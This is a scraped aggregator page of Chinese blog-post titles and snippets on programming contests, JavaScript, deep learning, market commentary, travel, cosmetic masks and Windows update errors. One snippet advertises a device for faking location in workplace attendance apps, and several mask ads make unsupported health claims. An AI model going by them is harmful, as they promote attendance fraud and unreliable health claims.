2024/4/19 11:34:17 - 哈尔滨理工大学软件与微电子学院程序设计竞赛 题解
DEF题比较难一些,目前本菜鸡能力有限。 文章目录A-RaceB-Min ValueC-CoronavirusG-OXRH-MazeI-PrimeJ-CompareK-WalkL-Defeat the monster A-Race 题解: 我们可以看到数据量并不是很大,所以我们可以选择一秒钟一秒钟来对这个比赛进行分析 在每一秒中 要判断 1.是否有人到达终…...
2024/4/18 3:22:57 - js嗅探ie浏览器版本(也可以嗅探是浏览器品牌)
2019独角兽企业重金招聘Python工程师标准>>> function myBrowser(){var userAgent = navigator.userAgent; //取得浏览器的userAgent字符串var isOpera = userAgent.indexOf("Opera") > -1; //判断是否Opera浏览器var isIE = userAgent.indexOf("…...
2024/4/20 0:43:57 - 网络安全从入门到精通的学习资源汇总
以上内容部分来源于网络,为提高大家安全学习的效率,我做了收录和整理。学习之路注定是孤独而寂寞,但是重要的是坚持以及对于安全的热情,引用黑哥的一句话:“整就牛!”综合学习平台https://www.vulbox.com/漏洞盒子http://vip.77169.com/华盟网校http://edu.gooann.com/安…...
2024/4/13 5:45:08
最新文章
- 计算机比赛什么含金量高
acm含金量不如天梯,和蓝桥杯是同一层次 先说结论,根据专家讨论结果,蓝桥国一水平和icpc金牌含金量一样。(doge 赢!瑶瑶另先! 会统计就多统计,我们acmer就是爱看这种数据 https://www.gxxsjs.co…...
2024/4/20 2:54:07 - 梯度消失和梯度爆炸的一些处理方法
在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言,在此感激不尽。 权重和梯度的更新公式如下: w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...
2024/3/20 10:50:27 - 《前端防坑》- JS基础 - 你觉得typeof nullValue === null 么?
问题 JS原始类型有6种Undefined, Null, Number, String, Boolean, Symbol共6种。 在对原始类型使用typeof进行判断时, typeof stringValue string typeof numberValue number 如果一个变量(nullValue)的值为null,那么typeof nullValue "?" const u …...
2024/4/19 9:18:44 - N5171B是德科技N5171B信号发生器
181/2461/8938产品概述: N5171B EXG 射频模拟信号发生器具有最佳的 EXG,旨在满足您对组件参数测试和接收器校准的信号需求。其出色的硬件性能可提供更快的吞吐量、更长的正常运行时间以及极好的准确性和可重复性。 Agilent / HP N5171B EXG 射频模拟信…...
2024/4/18 7:52:24 - 【外汇早评】美通胀数据走低,美元调整
原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...
2024/4/19 14:24:02 - 【原油贵金属周评】原油多头拥挤,价格调整
原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...
2024/4/19 18:20:22 - 【外汇周评】靓丽非农不及疲软通胀影响
原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...
2024/4/19 11:57:31 - 【原油贵金属早评】库存继续增加,油价收跌
原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...
2024/4/19 11:57:31 - 【外汇早评】日本央行会议纪要不改日元强势
原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...
2024/4/19 11:57:52 - 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响
原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...
2024/4/19 11:57:53 - 【外汇早评】美欲与伊朗重谈协议
原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...
2024/4/19 11:58:14 - 【原油贵金属早评】波动率飙升,市场情绪动荡
原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...
2024/4/19 11:58:20 - 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试
原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...
2024/4/19 23:45:49 - 【原油贵金属早评】市场情绪继续恶化,黄金上破
原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...
2024/4/19 11:58:39 - 【外汇早评】美伊僵持,风险情绪继续升温
原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...
2024/4/19 11:58:51 - 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势
原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...
2024/4/19 18:09:34 - 氧生福地 玩美北湖(上)——为时光守候两千年
原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...
2024/4/19 11:59:15 - 氧生福地 玩美北湖(中)——永春梯田里的美与鲜
原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...
2024/4/19 11:59:23 - 氧生福地 玩美北湖(下)——奔跑吧骚年!
原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...
2024/4/19 11:59:44 - 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!
原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...
2024/4/19 11:59:48 - 「发现」铁皮石斛仙草之神奇功效用于医用面膜
原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...
2024/4/19 12:00:06 - 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者
原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...
2024/4/19 16:57:22 - 广州械字号面膜生产厂家OEM/ODM4项须知!
原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...
2024/4/19 12:00:25 - 械字号医用眼膜缓解用眼过度到底有无作用?
原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...
2024/4/19 12:00:40 - 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...
解析如下:1、长按电脑电源键直至关机,然后再按一次电源健重启电脑,按F8健进入安全模式2、安全模式下进入Windows系统桌面后,按住“winR”打开运行窗口,输入“services.msc”打开服务设置3、在服务界面,选中…...
2022/11/19 21:17:18 - 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。
%读入6幅图像(每一幅图像的大小是564*564) f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...
2022/11/19 21:17:16 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...
win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面,在等待界面中我们需要等待操作结束才能关机,虽然这比较麻烦,但是对系统进行配置和升级…...
2022/11/19 21:17:15 - 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...
有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows,请勿关闭计算机”的提示,要过很久才能进入系统,有的用户甚至几个小时也无法进入,下面就教大家这个问题的解决方法。第一种方法:我们首先在左下角的“开始…...
2022/11/19 21:17:14 - win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...
置信有很多用户都跟小编一样遇到过这样的问题,电脑时发现开机屏幕显现“正在配置Windows Update,请勿关机”(如下图所示),而且还需求等大约5分钟才干进入系统。这是怎样回事呢?一切都是正常操作的,为什么开时机呈现“正…...
2022/11/19 21:17:13 - 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...
Win7系统开机启动时总是出现“配置Windows请勿关机”的提示,没过几秒后电脑自动重启,每次开机都这样无法进入系统,此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一:开机按下F8,在出现的Windows高级启动选…...
2022/11/19 21:17:12 - 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...
有不少windows10系统用户反映说碰到这样一个情况,就是电脑提示正在准备windows请勿关闭计算机,碰到这样的问题该怎么解决呢,现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法:1、2、依次…...
2022/11/19 21:17:11 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...
今天和大家分享一下win7系统重装了Win7旗舰版系统后,每次关机的时候桌面上都会显示一个“配置Windows Update的界面,提示请勿关闭计算机”,每次停留好几分钟才能正常关机,导致什么情况引起的呢?出现配置Windows Update…...
2022/11/19 21:17:10 - 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...
只能是等着,别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚,只能是考虑备份数据后重装系统了。解决来方案一:管理员运行cmd:net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...
2022/11/19 21:17:09 - 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?
原标题:电脑提示“配置Windows Update请勿关闭计算机”怎么办?win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢?一般的方…...
2022/11/19 21:17:08 - 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...
关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!关机提示 windows7 正在配…...
2022/11/19 21:17:05 - 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...
钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...
2022/11/19 21:17:05 - 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...
前几天班里有位学生电脑(windows 7系统)出问题了,具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面,长时间没反应,无法进入系统。这个问题原来帮其他同学也解决过,网上搜了不少资料&#x…...
2022/11/19 21:17:04 - 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...
本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法,并在最后教给你1种保护系统安全的好方法,一起来看看!电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中,添加了1个新功能在“磁…...
2022/11/19 21:17:03 - 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...
许多用户在长期不使用电脑的时候,开启电脑发现电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机。。.这要怎么办呢?下面小编就带着大家一起看看吧!如果能够正常进入系统,建议您暂时移…...
2022/11/19 21:17:02 - 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...
配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!配置windows update失败 还原更改 请勿关闭计算机&#x…...
2022/11/19 21:17:01 - 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...
不知道大家有没有遇到过这样的一个问题,就是我们的win7系统在关机的时候,总是喜欢显示“准备配置windows,请勿关机”这样的一个页面,没有什么大碍,但是如果一直等着的话就要两个小时甚至更久都关不了机,非常…...
2022/11/19 21:17:00 - 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...
当电脑出现正在准备配置windows请勿关闭计算机时,一般是您正对windows进行升级,但是这个要是长时间没有反应,我们不能再傻等下去了。可能是电脑出了别的问题了,来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...
2022/11/19 21:16:59 - 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...
我们使用电脑的过程中有时会遇到这种情况,当我们打开电脑之后,发现一直停留在一个界面:“配置Windows Update失败,还原更改请勿关闭计算机”,等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢࿰…...
2022/11/19 21:16:58 - 如何在iPhone上关闭“请勿打扰”
Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...
2022/11/19 21:16:57